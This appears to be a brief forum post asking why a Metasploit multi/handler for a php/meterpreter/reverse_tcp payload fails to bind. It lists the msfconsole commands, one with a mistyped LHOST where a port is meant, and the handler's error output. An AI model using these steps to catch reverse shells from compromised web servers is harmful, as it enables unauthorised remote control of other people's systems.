Metasploit php payload PRoblem

Im trying to connect with the php payload From my site but when  i press



msf>use multi/handler

msf>set PAYLOAD php/meterpreter/reverse_tcp

msf>set LHOST (my ip ) Exter

msf>set LHOST  443

msf>exploit -z -j 



tells this: 



[-]Handler Failed to bind to (my ip)

[-] Started reverse handler on 0.0.0.0:443

[-] Starting the payload handler
